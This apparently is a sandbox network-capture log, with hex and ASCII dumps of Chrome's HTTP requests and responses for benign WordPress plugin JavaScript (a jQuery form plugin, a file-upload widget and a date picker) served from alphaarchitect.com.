                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 74 22 29 7c 7c 70 2e 73 74 61 74 75 73 54 65 78 74 29 2c 28 6c 2e 64 61 74 61 54 79 70 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 2c 63 3d 2f 28 6a 73 6f 6e 7c 73 63 72 69 70 74 7c 74 65 78 74 29 2f 2e 74 65 73 74 28 73 29 3b 63 7c 7c 6c 2e 74 65 78 74 61 72 65 61 3f 28 72 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 74 65 78 74 61 72 65 61 22 29 5b 30 5d 29 3f 28 70 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 3d 72 2e 76 61 6c 75 65 2c 70 2e 73 74 61 74 75 73 3d 4e 75 6d 62 65 72 28 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 61 74 75 73 22 29 29 7c 7c 70 2e 73 74 61 74 75 73 2c 70 2e 73 74 61 74 75 73 54 65 78 74 3d 72 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 61 74 75 73 54 65 78 74 22 29
                                                                                                                                                                                                                                                                        Data Ascii: t")||p.statusText),(l.dataType||"").toLowerCase()),c=/(json|script|text)/.test(s);c||l.textarea?(r=b.getElementsByTagName("textarea")[0])?(p.responseText=r.value,p.status=Number(r.getAttribute("status"))||p.status,p.statusText=r.getAttribute("statusText")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 28 4c 2e 66 6e 2e 6f 6e 29 2c 65 2e 64 65 6c 65 67 61 74 69 6f 6e 7c 7c 30 21 3d 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3f 65 2e 64 65 6c 65 67 61 74 69 6f 6e 3f 28 4c 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 66 66 28 22 73 75 62 6d 69 74 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 61 29 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 72 29 2e 6f 6e 28 22 73 75 62 6d 69 74 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 65 2c 61 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 66 6f 72 6d 2d 70 6c 75 67 69 6e 22 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 2c 65 2c 72 29 2c 74 68 69 73 29 3a 74 68 69 73 2e 61 6a 61 78 46 6f 72 6d 55 6e
                                                                                                                                                                                                                                                                        Data Ascii: (L.fn.on),e.delegation||0!==this.length?e.delegation?(L(document).off("submit.form-plugin",this.selector,a).off("click.form-plugin",this.selector,r).on("submit.form-plugin",this.selector,e,a).on("click.form-plugin",this.selector,e,r),this):this.ajaxFormUn
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 65 3a 66 2c 76 61 6c 75 65 3a 64 5b 69 5d 2c 74 79 70 65 3a 63 2e 74 79 70 65 7d 29 3b 65 6c 73 65 20 61 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 66 2c 76 61 6c 75 65 3a 22 22 2c 74 79 70 65 3a 63 2e 74 79 70 65 7d 29 7d 65 6c 73 65 20 6e 75 6c 6c 21 3d 73 26 26 28 74 26 26 74 2e 70 75 73 68 28 63 29 2c 61 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 66 2c 76 61 6c 75 65 3a 73 2c 74 79 70 65 3a 63 2e 74 79 70 65 2c 72 65 71 75 69 72 65 64 3a 63 2e 72 65 71 75 69 72 65 64 7d 29 29 3b 21 65 26 26 72 2e 63 6c 6b 26 26 28 66 3d 28 75 3d 28 6e 3d 4c 28 72 2e 63 6c 6b 29 29 5b 30 5d 29 2e 6e 61 6d 65 29 26 26 21 75 2e 64 69 73 61 62 6c 65 64 26 26 22 69 6d 61 67 65 22 3d 3d 75 2e 74 79 70 65 26 26 28 61 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 66 2c 76 61 6c 75 65 3a 6e 2e 76 61
                                                                                                                                                                                                                                                                        Data Ascii: e:f,value:d[i],type:c.type});else a.push({name:f,value:"",type:c.type})}else null!=s&&(t&&t.push(c),a.push({name:f,value:s,type:c.type,required:c.required}));!e&&r.clk&&(f=(u=(n=L(r.clk))[0]).name)&&!u.disabled&&"image"==u.type&&(a.push({name:f,value:n.va


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        65192.168.2.449823141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC832OUTGET /wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fileupload/fileupload.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-258c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147810
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f2fe0f726f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC877INData Raw: 32 35 38 63 0d 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 70 6c 6f 61 64 20 46 69 6c 65 20 50 6c 75 67 69 6e 0a 20 2a 20 76 65 72 73 69 6f 6e 3a 20 33 2e 31 2e 32 0a 20 2a 20 40 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 35 20 6f 72 20 6c 61 74 65 72 20 26 20 66 6f 72 6d 20 70 6c 75 67 69 6e 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 52 61 76 69 73 68 61 6e 6b 65 72 20 4b 75 73 75 6d 61 0a 20 2a 20 68 74 74 70 3a 2f 2f 68 61 79 61 67 65 65 6b 2e 63 6f 6d 2f 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 69 66 28 62 2e 66 6e 2e 61 6a 61 78 46 6f 72 6d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 7d 76 61 72 20 61 3d 7b 7d 3b 61 2e 66 69 6c 65 61 70 69 3d 62 28 22 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 66 69 6c
                                                                                                                                                                                                                                                                        Data Ascii: 258c/*! * jQuery Upload File Plugin * version: 3.1.2 * @requires jQuery v1.5 or later & form plugin * Copyright (c) 2013 Ravishanker Kusuma * http://hayageek.com/ */(function(b){if(b.fn.ajaxForm==undefined){}var a={};a.fileapi=b("<input type='fil
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 76 2c 73 2c 75 29 7b 7d 2c 64 65 6c 65 74 65 43 61 6c 6c 62 61 63 6b 3a 21 31 2c 61 66 74 65 72 55 70 6c 6f 61 64 41 6c 6c 3a 21 31 2c 75 70 6c 6f 61 64 42 75 74 74 6f 6e 43 6c 61 73 73 3a 22 75 70 6c 6f 61 64 22 2c 64 72 61 67 44 72 6f 70 53 74 72 3a 22 22 2c 61 62 6f 72 74 53 74 72 3a 22 41 62 6f 72 74 22 2c 63 61 6e 63 65 6c 53 74 72 3a 22 43 61 6e 63 65 6c 22 2c 64 65 6c 65 74 65 6c 53 74 72 3a 22 44 65 6c 65 74 65 22 2c 64 6f 6e 65 53 74 72 3a 22 44 6f 6e 65 22 2c 6d 75 6c 74 69 44 72 61 67 45 72 72 6f 72 53 74 72 3a 22 4d 75 6c 74 69 70 6c 65 20 46 69 6c 65 20 44 72 61 67 20 26 61 6d 70 3b 20 44 72 6f 70 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 2e 22 2c 65 78 74 45 72 72 6f 72 53 74 72 3a 22 22 2c 73 69 7a 65 45 72 72 6f 72 53 74 72 3a 22 22 2c
                                                                                                                                                                                                                                                                        Data Ascii: v,s,u){},deleteCallback:!1,afterUploadAll:!1,uploadButtonClass:"upload",dragDropStr:"",abortStr:"Abort",cancelStr:"Cancel",deletelStr:"Delete",doneStr:"Done",multiDragErrorStr:"Multiple File Drag &amp; Drop is not allowed.",extErrorStr:"",sizeErrorStr:"",
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 74 65 72 55 70 6c 6f 61 64 41 6c 6c 28 6d 29 3b 67 3d 21 31 7d 65 6c 73 65 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 73 2c 31 30 30 29 7d 7d 29 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 77 2c 75 2c 76 29 7b 76 2e 6f 6e 28 22 64 72 61 67 65 6e 74 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 73 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 62 28 74 68 69 73 29 2e 63 73 73 28 22 62 6f 72 64 65 72 22 2c 22 32 70 78 20 64 61 73 68 65 64 20 23 64 64 64 22 29 7d 29 3b 76 2e 6f 6e 28 22 64 72 61 67 6f 76 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 73 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 3b 76
                                                                                                                                                                                                                                                                        Data Ascii: terUploadAll(m);g=!1}else{window.setTimeout(s,100)}})()}}function f(w,u,v){v.on("dragenter",function(s){s.stopPropagation();s.preventDefault();b(this).css("border","2px dashed #ddd")});v.on("dragover",function(s){s.stopPropagation();s.preventDefault()});v
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 2d 62 6c 6f 63 6b 27 3e 22 2b 48 2e 65 78 74 45 72 72 6f 72 53 74 72 2b 22 3c 2f 64 69 76 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 42 2e 65 72 72 6f 72 4c 6f 67 29 7d 63 6f 6e 74 69 6e 75 65 7d 69 66 28 48 2e 6d 61 78 46 69 6c 65 53 69 7a 65 21 3d 2d 31 26 26 75 5b 43 5d 2e 73 69 7a 65 3e 48 2e 6d 61 78 46 69 6c 65 53 69 7a 65 29 7b 69 66 28 48 2e 73 68 6f 77 45 72 72 6f 72 29 7b 62 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 27 3e 22 2b 48 2e 73 69 7a 65 45 72 72 6f 72 53 74 72 2b 22 3c 2f 64 69 76 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 42 2e 65 72 72 6f 72 4c 6f 67 29 7d 63 6f 6e 74 69 6e 75 65 7d 69 66 28 48 2e 6d 61 78 46 69 6c 65 43 6f 75 6e 74 21 3d 2d 31 26 26 42 2e 73 65 6c 65 63 74 65 64 46 69 6c 65 73 3e 3d
                                                                                                                                                                                                                                                                        Data Ascii: -block'>"+H.extErrorStr+"</div>").appendTo(B.errorLog)}continue}if(H.maxFileSize!=-1&&u[C].size>H.maxFileSize){if(H.showError){b("<div class='um-error-block'>"+H.sizeErrorStr+"</div>").appendTo(B.errorLog)}continue}if(H.maxFileCount!=-1&&B.selectedFiles>=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 79 2c 42 2c 44 2c 75 29 7b 76 61 72 20 41 3d 22 61 6a 61 78 2d 75 70 6c 6f 61 64 2d 69 64 2d 22 2b 28 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 29 3b 76 61 72 20 77 3d 62 28 22 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 27 22 2b 44 2e 6d 65 74 68 6f 64 2b 22 27 20 61 63 74 69 6f 6e 3d 27 22 2b 44 2e 75 72 6c 2b 22 27 20 65 6e 63 74 79 70 65 3d 27 22 2b 44 2e 65 6e 63 74 79 70 65 2b 22 27 3e 3c 2f 66 6f 72 6d 3e 22 29 3b 76 61 72 20 76 3d 22 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 66 69 6c 65 27 20 69 64 3d 27 22 2b 41 2b 22 27 20 6e 61 6d 65 3d 27 22 2b 44 2e 66 69 6c 65 4e 61 6d 65 2b 22 27 2f 3e 22 3b 69 66 28 44 2e 6d 75 6c 74 69 70 6c 65 29 7b 69 66 28 44 2e 66 69 6c 65 4e 61 6d 65 2e 69 6e 64 65
                                                                                                                                                                                                                                                                        Data Ascii: )}}function q(y,B,D,u){var A="ajax-upload-id-"+(new Date().getTime());var w=b("<form method='"+D.method+"' action='"+D.url+"' enctype='"+D.enctype+"'></form>");var v="<input type='file' id='"+A+"' name='"+D.fileName+"'/>";if(D.multiple){if(D.fileName.inde
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 69 6e 67 3a 30 7d 29 3b 76 61 72 20 43 3d 62 28 75 29 2e 77 69 64 74 68 28 29 2b 31 30 3b 69 66 28 43 3d 3d 31 30 29 7b 43 3d 31 32 30 7d 76 61 72 20 78 3d 75 2e 68 65 69 67 68 74 28 29 2b 31 30 3b 69 66 28 78 3d 3d 31 30 29 7b 78 3d 33 35 7d 75 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 63 75 72 73 6f 72 3a 22 64 65 66 61 75 6c 74 22 7d 29 3b 7a 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 74 6f 70 3a 22 30 70 78 22 2c 77 69 64 74 68 3a 27 31 30 30 25 27 2c 68 65 69 67 68 74 3a 27 33 34 70 78 27 2c 6c 65 66 74 3a 22 30 70 78 22 2c 22 7a 2d 69 6e 64 65 78 22 3a 22 31 30 30 22 2c 6f 70
                                                                                                                                                                                                                                                                        Data Ascii: ing:0});var C=b(u).width()+10;if(C==10){C=120}var x=u.height()+10;if(x==10){x=35}u.css({position:"relative",overflow:"hidden",cursor:"default"});z.css({position:"absolute",cursor:"pointer",top:"0px",width:'100%',height:'34px',left:"0px","z-index":"100",op
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 7b 69 66 28 79 2e 66 69 6c 65 44 61 74 61 21 3d 75 6e 64 65 66 69 6e 65 64 29 7b 45 2e 66 6f 72 6d 44 61 74 61 2e 61 70 70 65 6e 64 28 73 5b 44 5d 5b 30 5d 2c 73 5b 44 5d 5b 31 5d 29 7d 65 6c 73 65 7b 45 2e 64 61 74 61 5b 73 5b 44 5d 5b 30 5d 5d 3d 73 5b 44 5d 5b 31 5d 7d 7d 7d 7d 7d 41 2e 74 43 6f 75 6e 74 65 72 2b 3d 77 2e 6c 65 6e 67 74 68 3b 6a 28 29 3b 72 65 74 75 72 6e 21 30 7d 75 2e 73 74 61 74 75 73 62 61 72 2e 61 70 70 65 6e 64 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 27 3e 22 2b 79 2e 75 70 6c 6f 61 64 45 72 72 6f 72 53 74 72 2b 22 3c 2f 64 69 76 3e 22 29 3b 75 2e 63 61 6e 63 65 6c 2e 73 68 6f 77 28 29 3b 7a 2e 72 65 6d 6f 76 65 28 29 3b 75 2e 63 61 6e 63 65 6c 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: {if(y.fileData!=undefined){E.formData.append(s[D][0],s[D][1])}else{E.data[s[D][0]]=s[D][1]}}}}}A.tCounter+=w.length;j();return!0}u.statusbar.append("<div class='um-error-block'>"+y.uploadErrorStr+"</div>");u.cancel.show();z.remove();u.cancel.click(functio
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC529INData Raw: 28 29 3b 69 66 28 43 2e 73 74 61 74 75 73 54 65 78 74 3d 3d 22 61 62 6f 72 74 22 29 7b 75 2e 73 74 61 74 75 73 62 61 72 2e 68 69 64 65 28 22 73 6c 6f 77 22 29 2e 72 65 6d 6f 76 65 28 29 3b 68 28 79 2c 41 29 7d 65 6c 73 65 7b 79 2e 6f 6e 45 72 72 6f 72 2e 63 61 6c 6c 28 74 68 69 73 2c 77 2c 73 2c 42 29 3b 69 66 28 79 2e 73 68 6f 77 53 74 61 74 75 73 41 66 74 65 72 45 72 72 6f 72 29 7b 75 2e 70 72 6f 67 72 65 73 73 44 69 76 2e 68 69 64 65 28 29 3b 75 2e 73 74 61 74 75 73 62 61 72 2e 61 70 70 65 6e 64 28 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 75 6d 2d 65 72 72 6f 72 2d 62 6c 6f 63 6b 27 3e 45 52 52 4f 52 3a 20 22 2b 42 2b 22 3c 2f 73 70 61 6e 3e 22 29 7d 65 6c 73 65 7b 75 2e 73 74 61 74 75 73 62 61 72 2e 68 69 64 65 28 29 3b 75 2e 73 74 61 74 75 73 62 61
                                                                                                                                                                                                                                                                        Data Ascii: ();if(C.statusText=="abort"){u.statusbar.hide("slow").remove();h(y,A)}else{y.onError.call(this,w,s,B);if(y.showStatusAfterError){u.progressDiv.hide();u.statusbar.append("<span class='um-error-block'>ERROR: "+B+"</span>")}else{u.statusbar.hide();u.statusba
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        66192.168.2.449824141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC594OUTGET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.date.min.js?ver=3.6.2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-3122"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147810
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f30bcb7cab-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC877INData Raw: 33 31 32 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 2e 2f 70 69 63 6b 65 72 22 2c 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 2e 2f 70 69 63 6b 65 72 2e 6a 73 22 29 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 65 28 50 69 63 6b 65 72 2c 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 2c 70 29 7b 76 61 72 20 74 2c 79 3d 65 2e 5f 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 61 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 72 2e
                                                                                                                                                                                                                                                                        Data Ascii: 3122!function(e){"function"==typeof define&&define.amd?define(["./picker","jquery"],e):"object"==typeof exports?module.exports=e(require("./picker.js"),require("jquery")):e(Picker,jQuery)}(function(e,p){var t,y=e._;function a(t,a){function e(){return r.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 2c 6f 2c 7b 66 6f 72 6d 61 74 3a 73 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 21 30 7d 29 3a 69 2e 73 65 74 28 22 73 65 6c 65 63 74 22 2c 6e 75 6c 6c 29 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 69 2e 69 74 65 6d 2e 6e 6f 77 29 2c 69 2e 6b 65 79 3d 7b 34 30 3a 37 2c 33 38 3a 2d 37 2c 33 39 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 3f 2d 31 3a 31 7d 2c 33 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 3f 31 3a 2d 31 7d 2c 67 6f 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 69 2e 69 74 65 6d 2e 68 69 67 68 6c 69 67 68 74 2c 74 3d 6e 65 77 20 44 61 74 65 28 74 2e 79 65 61 72 2c 74 2e 6d 6f 6e 74 68 2c 74 2e 64 61 74 65 2b 65 29 3b 69 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 74 2c 7b
                                                                                                                                                                                                                                                                        Data Ascii: ,o,{format:s,defaultValue:!0}):i.set("select",null).set("highlight",i.item.now),i.key={40:7,38:-7,39:function(){return e()?-1:1},37:function(){return e()?1:-1},go:function(e){var t=i.item.highlight,t=new Date(t.year,t.month,t.date+e);i.set("highlight",t,{
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 2e 73 65 74 28 22 76 69 65 77 22 2c 65 2e 68 69 67 68 6c 69 67 68 74 2c 6e 29 3a 74 2e 6d 61 74 63 68 28 2f 5e 28 66 6c 69 70 7c 6d 69 6e 7c 6d 61 78 7c 64 69 73 61 62 6c 65 7c 65 6e 61 62 6c 65 29 24 2f 29 26 26 28 65 2e 73 65 6c 65 63 74 26 26 69 2e 64 69 73 61 62 6c 65 64 28 65 2e 73 65 6c 65 63 74 29 26 26 69 2e 73 65 74 28 22 73 65 6c 65 63 74 22 2c 65 2e 73 65 6c 65 63 74 2c 6e 29 2c 65 2e 68 69 67 68 6c 69 67 68 74 29 26 26 69 2e 64 69 73 61 62 6c 65 64 28 65 2e 68 69 67 68 6c 69 67 68 74 29 26 26 69 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 65 2e 68 69 67 68 6c 69 67 68 74 2c 6e 29 29 2c 69 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 74 65 6d 5b 65 5d 7d
                                                                                                                                                                                                                                                                        Data Ascii: .set("view",e.highlight,n):t.match(/^(flip|min|max|disable|enable)$/)&&(e.select&&i.disabled(e.select)&&i.set("select",e.select,n),e.highlight)&&i.disabled(e.highlight)&&i.set("highlight",e.highlight,n)),i},a.prototype.get=function(e){return this.item[e]}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 61 74 65 28 74 2e 67 65 74 44 61 74 65 28 29 2b 61 2e 72 65 6c 29 2c 74 68 69 73 2e 6e 6f 72 6d 61 6c 69 7a 65 28 74 2c 61 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 61 76 69 67 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 70 2e 69 73 41 72 72 61 79 28 74 29 2c 73 3d 70 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 74 29 2c 6c 3d 74 68 69 73 2e 69 74 65 6d 2e 76 69 65 77 3b 69 66 28 6f 7c 7c 73 29 7b 66 6f 72 28 72 3d 73 3f 28 6e 3d 74 2e 79 65 61 72 2c 69 3d 74 2e 6d 6f 6e 74 68 2c 74 2e 64 61 74 65 29 3a 28 6e 3d 2b 74 5b 30 5d 2c 69 3d 2b 74 5b 31 5d 2c 2b 74 5b 32 5d 29 2c 61 26 26 61 2e 6e 61 76 26 26 6c 26 26 6c 2e 6d 6f 6e 74 68 21 3d 3d 69 26 26 28 6e 3d 6c 2e 79 65 61 72 2c 69 3d 6c 2e 6d 6f
                                                                                                                                                                                                                                                                        Data Ascii: ate(t.getDate()+a.rel),this.normalize(t,a)},a.prototype.navigate=function(e,t,a){var n,i,r,o=p.isArray(t),s=p.isPlainObject(t),l=this.item.view;if(o||s){for(r=s?(n=t.year,i=t.month,t.date):(n=+t[0],i=+t[1],+t[2]),a&&a.nav&&l&&l.month!==i&&(n=l.year,i=l.mo
